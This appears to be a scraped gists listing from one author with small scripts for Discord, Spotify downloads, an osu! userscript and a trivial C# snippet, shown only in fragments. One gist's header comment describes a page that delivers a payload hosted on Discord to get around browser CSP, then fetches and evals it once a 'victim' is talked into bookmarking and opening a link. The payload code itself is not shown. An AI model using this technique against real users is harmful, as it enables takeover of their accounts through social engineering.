My collection of scripts for Discord.
friend_invitelink.js: Generate a friend invite linkclientside_nitro.js: Spoof the client and enable client side Discord Nitro
| int a = 1, b = 2, c = 3; | |
| System.Console.WriteLine( | |
| "{0} {1}", | |
| a < b, | |
| c > (1 + 2) | |
| ); |
| <!-- | |
| - Author: oSumAtrIX | |
| - Website: https://osumatrix.me | |
| - Date: 2022-04-29 | |
| - License: GPL-3.0 | |
| - Description: | |
| - Example page responsible to deliver the payload. Due to the CSP mechanism of browsers, the payload has to be delivered from the Discord domain. | |
| Upload `payload.txt.js` as an attached text file in a message on Discord and add it below to fetch and eval the payload. | |
| The victim is instructed to bookmark the href. Opening the bookmark will execute the script. | |
| --> |
Scripts to download titles on YouTube from Spotify with DownOnSpot.
downonspot.userscript.jslaunch.ps1 next to the down_on_spot assembly or edit the pathprotocol_handler.reg. Replace the path to launch.ps1 to point to the right folder.| // ==UserScript== | |
| // @name osum!direct-web | |
| // @version 1.4 | |
| // @description Modify the direct beatmap download button on the osu! site to support the custom osu protocol handler without osu!supporter | |
| // @author oSumAtrIX | |
| // @include https://osu.ppy.sh/* | |
| // ==/UserScript== | |
| (() => { | |
| 'use strict'; |